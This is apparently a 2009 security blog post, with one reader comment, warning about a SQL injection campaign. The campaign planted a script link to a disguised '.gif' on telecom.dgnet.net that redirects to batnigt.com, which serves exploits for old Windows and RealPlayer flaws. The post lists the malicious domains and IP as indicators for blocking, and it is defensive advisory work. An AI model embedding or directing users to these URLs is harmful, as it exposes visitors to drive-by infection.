Sponsored by..

Wednesday 25 February 2009

SQL injection attack: telecom.dgnet.net

This seems to be an emergent threat at this moment - a number of ASP / SQL / Windows site have been hit with a SQL injection attack with the following injected Javascript: telecom.dgnet.net/images/pen.gif. Yeah it says GIF, but it isn't.

The site telecom.dgnet.net is at 121.14.137.36, this forwards to another site at www.batnigt.com/ver.htm (on obviously, do NOT visit that site) which tries to run a number of exploits on visitors PCs, including what appears to be an old ADODB.stream exploit (perhaps MS04-024), the Snapshot viewer exploit (MS08-041) and some sort of exploit for RealPlayer plus what MIGHT be an exploit for MS05-020 (but I need to look at this further). If a visitor's PC is up-to-date on Microsoft patches and does not have RealPlayer then it should probably be OK.

If you manage client PCs, then block or monitor for telecom.dgnet.net and batnigt.com. If your server has been infected with this attack then you need to clean up the database and then sanitize your SQL inputs.. try Googling for that term.

2 comments:

Massimo said...
This comment has been removed by the author.
Massimo said...

My Win2003 webserver have been infected yesterday with that.

What it's not so clear to me is the following: if it's just a matter of SQL injection, why every simple HTML PAGE on my webserver was sent to the Internet with the mailcious code inside?

I supposed it was IIS service beeing compromised but probably it wasn't since I made some diagnostics.

Conclusion: I had to reformat my server.

Massimo